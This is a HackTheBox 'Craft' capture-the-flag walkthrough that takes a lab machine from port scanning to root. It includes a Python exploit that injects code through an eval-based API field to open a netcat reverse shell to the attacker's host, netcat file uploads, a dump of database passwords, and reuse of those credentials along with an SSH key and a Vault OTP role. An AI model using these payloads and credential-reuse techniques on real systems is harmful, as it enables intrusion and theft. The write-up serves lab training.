I"^F<h1 id="hackthebox--craft">HackTheBox :: Craft</h1>

<h2 id="initial-enumeration">Initial Enumeration</h2>
<p>Let’s start our initial enumeration by performing a tcp port scan.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nmap -sCSV -p 1-10000 10.10.10.110
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-31 02:47 AEDT
Nmap scan report for 10.10.10.110
Host is up (0.066s latency).
Not shown: 9997 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
| ssh-hostkey: 
|   2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
|   256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_  256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
443/tcp  open  ssl/http nginx 1.15.8
|_http-server-header: nginx/1.15.8
|_http-title: About
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after:  2020-06-20T02:25:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
6022/tcp open  ssh      (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Go
| ssh-hostkey: 
|_  2048 5b:cc:bf:f1:a1:8f:72:b0:c0:fb:df:a3:01:dc:a6:fb (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port6022-TCP:V=7.80%I=7%D=12/31%Time=5E0A1C5C%P=x86_64-pc-linux-gnu%r(N
SF:ULL,C,"SSH-2\.0-Go\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>
<p><br /></p>

<p>Nothing particularly interesting here. An HTTPS server running on port 443, and a weird looking SSH
server running on port 6022. Some research on the technologies behind the 6022 SSH server reveal
some username enumeration vulnerabilities but nothing of note.</p>

<p>Let’s fire up burpsuite and begin spidering the HTTPS server (let’s not forget to add “craft.htb”
to our /etc/hosts file). We just want to get a feel for what is on the site.</p>

<p>The first thing that jumps out at me are links to two virtual hosts “api.craft.htb”, and
“gogs.craft.htb”. Before jumping to those subdomains, we should probably do some vhost discovery.
Let’s fire up gobuster and take a look.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gobuster vhost -u https://craft.htb --wordlist=SecLists/Discovery/Web-Content/common.txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          https://craft.htb
[+] Threads:      10
[+] Wordlist:     SecLists/Discovery/Web-Content/common.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2019/12/31 02:58:21 Starting gobuster
===============================================================
Found: api.craft.htb (Status: 404) [Size: 233]
Found: vault.craft.htb (Status: 404) [Size: 19]
===============================================================
2019/12/31 02:58:55 Finished
===============================================================
</code></pre></div></div>
<p><br /></p>

<p>Nice, so we found another vhost; “vault.craft.htb”. I think our next step should be to visit the
“api.craft.htb” vhost, so let’s add this to our scope on burp and begin enumeration (note: don’t
forget to add the vhosts to your /etc/hosts file).</p>

<p>Just a swagger api spec here, however this vhost does appear to contain all the api functionality
for some application, could be a way in, but we’ll take a closer look later. Let’s have a look at
the “gogs.craft.htb” vhost next.</p>

<p>This page is a lot more interesting. It’s a self-hosted git management service. When we visit the
“explore” link, we discover what looks like the repository for the api we discovered earlier.
Digging through the issues and commit history we find some credentials for the api in a test script
that Dinesh uploaded, but later removed. Oh no, Dinesh.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
</code></pre></div></div>

<p>A quick <code class="language-plaintext highlighter-rouge">curl</code> request will confirm whether
these credentials are still valid.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ curl https://api.craft.htb/api/auth/login -u dinesh:4aUh0A8PbVJxgd -k
{"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZGluZXNoIiwiZXhwIjoxNTc3NzMzNTYwfQ.oLb0iw5P-JOaWpB3Jjq14VwIm8AJRmp3lQjcNY014lY"}
</code></pre></div></div>
<p><br /></p>

<p>They’re still valid. Oh no, Dinesh. Why? I hope you haven’t re-used these credentials for the
git management service. Let’s give them a try.</p>

<p>Sigh, they worked. I’m not sure what I expected. Let’s dig around some more now that we have access
to Dinesh’s account.</p>

<h2 id="initial-foothold">Initial Foothold</h2>
<p>So a bit more digging around with Dinesh’s account didn’t reveal anything too important. However I
went through all the commits again we find a fix that Dinesh committed. Where he used an eval
statement on user input. Oh, Dinesh. Unfortunately we need credentials to use it. But guess who
leaked their credentials earlier? Thanks, Dinesh. Now we just need to figure out how we can get
RCE. Let’s write a quick python script to leverage this and see if we can get a reverse shell.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python3
</span>
<span class="n">PAYLOAD</span> <span class="o">=</span> <span class="s">'nc 10.10.14.41 4444 -e /bin/sh'</span>

<span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">from</span> <span class="nn">urllib3.exceptions</span> <span class="kn">import</span> <span class="n">InsecureRequestWarning</span>

<span class="c1"># Ignore insecure https request warnings.
</span><span class="n">requests</span><span class="p">.</span><span class="n">packages</span><span class="p">.</span><span class="n">urllib3</span><span class="p">.</span><span class="n">disable_warnings</span><span class="p">(</span><span class="n">category</span><span class="o">=</span><span class="n">InsecureRequestWarning</span><span class="p">)</span>

<span class="n">base_url</span> <span class="o">=</span> <span class="s">'https://api.craft.htb/api/'</span>
<span class="n">creds</span> <span class="o">=</span> <span class="p">(</span><span class="s">'dinesh'</span><span class="p">,</span> <span class="s">'4aUh0A8PbVJxgd'</span><span class="p">)</span>

<span class="c1"># Retrieve the authentication token.
</span><span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">base_url</span><span class="o">+</span><span class="s">'auth/login'</span><span class="p">,</span> <span class="n">auth</span><span class="o">=</span><span class="n">creds</span><span class="p">,</span> <span class="n">verify</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>

<span class="c1"># Set our headers.
</span><span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">'X-Craft-API-Token'</span><span class="p">:</span> <span class="n">r</span><span class="p">.</span><span class="n">json</span><span class="p">()[</span><span class="s">'token'</span><span class="p">],</span>
    <span class="s">'Content-Type'</span><span class="p">:</span> <span class="s">'application/json'</span>
<span class="p">}</span>

<span class="c1"># Check whether token is valid.
</span><span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">base_url</span><span class="o">+</span><span class="s">'auth/check'</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">verify</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
<span class="k">assert</span> <span class="n">r</span><span class="p">.</span><span class="n">json</span><span class="p">()[</span><span class="s">'message'</span><span class="p">]</span> <span class="o">==</span> <span class="s">'Token is valid!'</span>

<span class="c1"># Craft payload.
</span><span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">'name'</span><span class="p">:</span> <span class="s">'ghuul'</span><span class="p">,</span>
    <span class="s">'brewer'</span><span class="p">:</span> <span class="s">'ghuul'</span><span class="p">,</span>
    <span class="s">'style'</span><span class="p">:</span> <span class="s">'ghuul'</span>
<span class="p">}</span>
<span class="n">payload</span><span class="p">[</span><span class="s">'abv'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'__import__("os").system("%s") or 10'</span> <span class="o">%</span> <span class="n">PAYLOAD</span>

<span class="c1"># Make request with payload.
</span><span class="n">payload</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">base_url</span><span class="o">+</span><span class="s">'brew/'</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span> <span class="n">verify</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span>
</code></pre></div></div>
<p><br /></p>

<p>Let’s start up netcat on our end… and we have a shell.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc -lv -p 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from craft.htb [10.10.10.110] 45519
# ls
app.py
craft_api
dbtest.py
tests
</code></pre></div></div>
<p><br /></p>

<h2 id="getting-user">Getting User</h2>
<p>So, a few things to note: we’re logged in as root, but we can’t <code class="language-plaintext highlighter-rouge">cat /root/root.txt</code>. In
conclusion, we are in a jail. Let’s do some digging around on the server for now, there seem to be
a few interesting files.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># whoami
root
</code></pre></div></div>
<p><br /></p>

<p>After a tiny bit of digging I ran into a file called <code class="language-plaintext highlighter-rouge">dbtest.py</code> (we ran into it earlier on the
git repo too), and it seems to connect and query the database successfully. So what happens if we
upload our own version that allows us to execute arbitrary queries? With a slight modification to
our foothold script we can upload a file to the server.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">PAYLOAD</span> <span class="o">=</span> <span class="s">'nc 10.10.xx.xx 4444 &gt; database.py'</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc -lv -p 4444 &lt; database.py
listening on [any] 4444 ...
connect to [10.10.xx.xx] from craft.htb [10.10.10.110] 4220
</code></pre></div></div>
<p><br /></p>

<p>Now let’s list the tables for the database, and see if we can read some of the more interesting
sounding ones.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc -lv -p 4444
listening on [any] 4444 ...
connect to [10.10.xx.xx] from craft.htb [10.10.10.110] 39969
# ls
app.py
craft_api
database.py
dbtest.py
tests
# python3 database.py
 &gt;&gt; SELECT table_name FROM information_schema.tables
{'TABLE_NAME': 'brew'}
{'TABLE_NAME': 'user'}

...

 &gt;&gt; SELECT * FROM user 
{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}
{'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}
{'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}
 &gt;&gt; exit
# exit
</code></pre></div></div>
<p><br /></p>

<p>Awesome! More credentials. I wonder if any of these will work for the web server? Let’s try logging
into the git management service with these new credentials.</p>

<p>Gilfoyle! Of all the people I wouldn’t have expected to re-use credentials, it was you? Even
Erlich didn’t re-use his for the git management service! Anyway, a bit of clicking around reveals a
new private repository. And in this repository… an ssh key! More credentials, yikes, but at least
this repo is private. Let’s try and use this new key, taking a look at the public key, it looks
like he used the username “gilfoyle”.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ssh -i ssh_gilfoyle gilfoyle@10.10.10.110

  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Enter passphrase for key 'keys/ssh_gilfoyle':
</code></pre></div></div>
<p><br /></p>

<p>Ah, a password. No matter. Let’s get cracking.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ /usr/share/john/ssh2john.py ssh_gilfoyle &gt; ssh_gilfoyle.hash
$ john ssh_gilfoyle.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 12 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
</code></pre></div></div>
<p><br /></p>

<p>Wow, nothing? I guess we’ll try the password he re-used for the git service, since the guys at
Pied Piper seem to like re-using credentials.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ssh -i keys/ssh_gilfoyle gilfoyle@10.10.10.110


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/



Enter passphrase for key 'keys/ssh_gilfoyle':
gilfoyle@craft:~$ 
</code></pre></div></div>
<p><br /></p>

<p>And… we’re in. So much credential re-use. Guys, get a password manager, seriously. Let’s get the
user flag now.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gilfoyle@craft:~$ cat user.txt 
bbf4b0cadfa3d4e6d0914c9cd5a612d4
</code></pre></div></div>
<p><br /></p>

<h2 id="getting-root">Getting Root</h2>
<p>To start, let’s take a look at Gilfoyle’s home directory. Interesting, a file called .vault-token?
We’ve seen mentions of a “vault” around the git repo and we found a vhost with the name “vault”.
Let’s take a look at the files we saw on the git repo.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vault secrets enable ssh

vault write ssh/roles/root_otp \
    key_type=otp \
    default_user=root \
    cidr_list=0.0.0.0/0
</code></pre></div></div>
<p><br /></p>

<p>Interesting. Seems like there is some sort of SSH system here. I think it’s time to do some
Googling and see what we can find out about this service.</p>

<p>So after a bit of research it’s pretty obvious that this is set up as a OTP authentication system
for SSH. You can read more about it
<a href="https://www.vaultproject.io/docs/secrets/ssh/one-time-ssh-passwords.html">here</a>. It seems that
this one is set up for SSH’ing in as root, nice. Let’s give this a go.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gilfoyle@craft:~$ vault ssh -role root_otp -mode otp root@10.10.10.110
OTP for the session is: 91220244-1b96-5827-2533-9e05874b36b2
Password:
root@craft:~#
</code></pre></div></div>

<p>Perfect, it worked. Let’s get the root flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@craft:~# cat root.txt 
831d64ef54d92c1af795daae28a11591
</code></pre></div></div>

<h2 id="lessons-learned">Lessons Learned</h2>
<ul>
  <li>People re-use passwords, like, a lot. So when you find credentials, try them everywhere.</li>
  <li>Always leverage bad coding practices, like the use of “eval”, and “exec”, etc.</li>
  <li>People commonly commit credentials to git repos and later remove them, not realising they’re still in the commit history.</li>
</ul>
:ET